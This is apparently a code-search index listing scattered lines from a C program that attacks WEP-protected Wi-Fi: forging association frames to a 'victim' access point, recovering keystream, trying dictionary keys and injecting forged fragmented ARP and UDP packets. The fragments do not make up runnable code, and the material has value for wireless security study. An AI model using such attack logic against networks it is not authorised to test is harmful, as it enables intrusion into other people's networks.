82 	struct ieee80211_frame wh;
585 void fill_basic(struct ieee80211_frame* wh) {
588 	memcpy(wh->i_addr1, victim.bss, 6);
589 	memcpy(wh->i_addr2, mymac, 6);
590 	memcpy(wh->i_addr3, victim.bss, 6);
594 	sp = (unsigned short*) wh->i_seq;
597 	sp = (unsigned short*) wh->i_dur;
603 	struct ieee80211_frame* wh = (struct ieee80211_frame*) buf;
608 	fill_basic(wh);
609 	wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_ASSOC_REQ;
611 	body = (unsigned char*) wh + sizeof(*wh);
631 	send_frame(tx, buf, sizeof(*wh) + 2 + 2 + 2 + 
659 	struct ieee80211_frame* wh = (struct ieee80211_frame*) buf;
663 	fill_basic(wh);
664 	wh->i_fc[0] |= IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_AUTH;
666 	n = (unsigned short*) ((unsigned char*) wh + sizeof(*wh));
670 	send_frame(tx, buf, sizeof(*wh) + 2 + 2 + 2);
673 int get_victim_ssid(struct ieee80211_frame* wh, int len) {
678 	if (len <= sizeof(*wh)) {
683 	ptr = (unsigned char*)wh + sizeof(*wh);
684 	len -= sizeof(*wh);
693 		if (memcmp(wh->i_addr3, victim_mac, 6) != 0)
754 		memcpy(victim.bss, wh->i_addr3, 6);
995 void stuff_for_us(struct ieee80211_frame* wh, int len) {
999 	type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
1000 	stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
1002 	body = (unsigned char*) wh + sizeof(*wh);
1094 		dlen = len - sizeof(*wh) - 4 -4;
1096 		if (!( wh->i_fc[1] & IEEE80211_FC1_PROTECTED)) {
1098 				   mac2str(wh->i_addr2), dlen, stype);
1102 		assert (wh->i_fc[1] & IEEE80211_FC1_PROTECTED);
1113 			memcpy (rtrmac, wh->i_addr3, 6);
1143 			log_dictionary(body, len - sizeof(*wh));
1150 		type, stype, mac2str(wh->i_addr2), len);
1154 void decrypt_arpreq(struct ieee80211_frame* wh, int rd) {
1162 	body = (unsigned char*) wh+sizeof(*wh);
1177 	memcpy(ptr, wh->i_addr3, 6);
1179 	bodylen = rd - sizeof(*wh) - 4 - 4;
1203 	time_print("Got ARP request from (%s)\n", mac2str(wh->i_addr3));
1206 void log_wep(struct ieee80211_frame* wh, int len) {
1210 	unsigned char *body = (unsigned char*) (wh+1);
1220 	rd = write(weplog.fd, wh, len);
1242 void try_dictionary(struct ieee80211_frame* wh, int len) {
1257 	body = (unsigned char*) wh + sizeof(*wh);
1276 	dlen = len - sizeof(*wh) - 4;
1302 	if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS)
1303 		smac = wh->i_addr3;
1305 		smac = wh->i_addr2;
1307 	if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS)
1308 		dmac = wh->i_addr3;
1310 		dmac = wh->i_addr1;
1336 int is_arp(struct ieee80211_frame *wh, int len)
1346 void *get_sa(struct ieee80211_frame *wh)
1348         if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS)
1349                 return wh->i_addr3;
1351                 return wh->i_addr2;
1354 void *get_da(struct ieee80211_frame *wh)
1356         if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS)
1357                 return wh->i_addr1;
1359                 return wh->i_addr3;
1362 int known_clear(void *clear, struct ieee80211_frame *wh, int len)
1367         if (!is_arp(wh, len)) {
1400         if (memcmp(get_da(wh), "\xff\xff\xff\xff\xff\xff", 6) == 0)
1408         memcpy(ptr, get_sa(wh), len);
1415 void add_keystream(struct ieee80211_frame* wh, int rd)
1420 	unsigned char *body = (unsigned char*) (wh+1);
1423 	clearsize = known_clear(clear, wh, dlen);
1433 void got_wep(struct ieee80211_frame* wh, int rd) {
1443 	body = (unsigned char*) wh + sizeof(*wh);
1447 	if ( (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) ||
1448 	     ( (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) &&
1449 	        memcmp(wh->i_addr2, mymac, 6) != 0) ) {
1455 		log_wep(wh, rd);
1456 		add_keystream(wh, rd);
1459 		try_dictionary(wh, rd);
1463 	if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) &&
1464 	    (memcmp(wh->i_addr3, mymac, 6) != 0) &&
1465 	    (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) &&
1469 		decrypt_arpreq(wh, rd);
1475 		if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) &&
1476 		    (memcmp(wh->i_addr3, mymac, 6) == 0) &&
1477 		    (memcmp(wh->i_addr1, "\xff\xff\xff\xff\xff\xff", 6) == 0) &&
1488 		if ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) &&
1489 		    (memcmp(wh->i_addr3, mymac, 6) == 0) &&
1490 		    (memcmp(wh->i_addr1, MCAST_PREF, 5) == 0) &&
1493 			unsigned char pr = wh->i_addr1[5];
1546 	clearsize = known_clear(clear, wh, dlen);
1552 void stuff_for_net(struct ieee80211_frame* wh, int rd) {
1555 	type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
1556 	stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
1564 			if (wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) {
1565 				memcpy(mac, wh->i_addr3, 6);
1566 			} else if (wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) {
1567 				memcpy(mac, wh->i_addr1, 6);
1580 		if ( (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) &&
1582 			got_wep(wh, rd);
1588 	struct ieee80211_frame* wh = (struct ieee80211_frame *) buf;
1600 	type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK;
1601 	stype = wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK;
1606 		if (memcmp(wh->i_addr1, mymac, 6) == 0) {
1614 	seqptr = (unsigned short*)  wh->i_seq;
1616 	if (seq == lastseq && (wh->i_fc[1] & IEEE80211_FC1_RETRY) &&
1629 			    	if (get_victim_ssid(wh, rd)) {
1640 			stuff_for_us(wh, rd);
1644 		if ( ((wh->i_fc[1] & IEEE80211_FC1_DIR_TODS) &&
1645 			  (memcmp(victim.bss, wh->i_addr1, 6) == 0)) || 
1647 			  ((wh->i_fc[1] & IEEE80211_FC1_DIR_FROMDS) &&
1648 			  (memcmp(victim.bss, wh->i_addr2, 6) == 0))
1650 			stuff_for_net(wh, rd);
1691 	struct ieee80211_frame* wh;
1700 	wh = (struct ieee80211_frame*) buf;
1701 	memcpy(wh, &fs->wh, sizeof(*wh));
1703 	body = (unsigned char*) wh + sizeof(*wh);
1714 		wh->i_fc[1] |= IEEE80211_FC1_MORE_FRAG;
1718 		wh->i_fc[1] &= ~IEEE80211_FC1_MORE_FRAG;
1731 	seq = (unsigned short*) &wh->i_seq;
1736 	send_frame(tx, buf, sizeof(*wh) + 4 + fragsize+4);
1738 	seq = (unsigned short*) &fs->wh.i_seq;
1765 	memset(&fs->wh, 0, sizeof(fs->wh));
1766 	fill_basic(&fs->wh);
1768 	memset(fs->wh.i_addr3, 0xff, 6);
1769 	fs->wh.i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
1770 	fs->wh.i_fc[1] |= IEEE80211_FC1_DIR_TODS |
1804 		memcpy(decryptstate.fragstate.wh.i_addr3,
1807 		decryptstate.fragstate.wh.i_addr3[5] =
1824 		decryptstate.fragstate.wh.i_addr3[5] =
1830 		seq = (unsigned short*) &decryptstate.fragstate.wh.i_seq;
1850 		struct ieee80211_frame* wh;
1858 		wh = (struct ieee80211_frame*) arp_pkt;
1859 		fill_basic(wh);
1861 		wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
1862 		wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS;
1863 		memset(wh->i_addr3, 0xff, 6);
1865 		body = (unsigned char*) wh + sizeof(*wh);
1875 		arp_len = sizeof(*wh) + 4 + 8 + 8 + 20 + 4;
1880 		wh = (struct ieee80211_frame*) udp_pkt;
1881 		fill_basic(wh);
1883 		wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
1884 		wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS;
1885 		memcpy(wh->i_addr3, rtrmac, 6);
1887 		body = (unsigned char*) wh + sizeof(*wh);
1924 		udp_len = sizeof(*wh) + 4 + 8 + 20 + 8 + 5 + 4;
1969 	struct ieee80211_frame* wh;
1975 	wh = (struct ieee80211_frame*) arp_pkt;
1976 	fill_basic(wh);
1978 	wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
1979 	wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS;
1980 	memset(wh->i_addr3, 0xff, 6);
1982 	body = (unsigned char*) wh + sizeof(*wh);
1991 	arp_len = sizeof(*wh) + 4 + 8 + 8 + 20 + 4;
2220 	struct ieee80211_frame* wh;
2249 	assert (rd < (sizeof(buf)-sizeof(*wh) - 8 - 8));
2253 	wh = (struct ieee80211_frame*) taptx;
2254 	memset(wh, 0, sizeof(*wh));
2255 	fill_basic(wh);
2257         wh->i_fc[0] |= IEEE80211_FC0_TYPE_DATA;
2258         wh->i_fc[1] |= IEEE80211_FC1_PROTECTED | IEEE80211_FC1_DIR_TODS;
2260 	memcpy(wh->i_addr2, eh->ether_shost, 6);
2261 	memcpy(wh->i_addr3, eh->ether_dhost, 6);
2263         body = (unsigned char*) wh + sizeof(*wh);
2273 	taptx_len = sizeof(*wh) + 4 + 8 + dlen + 4;

Indexes created Sat May 04 09:44:38 MDT 2024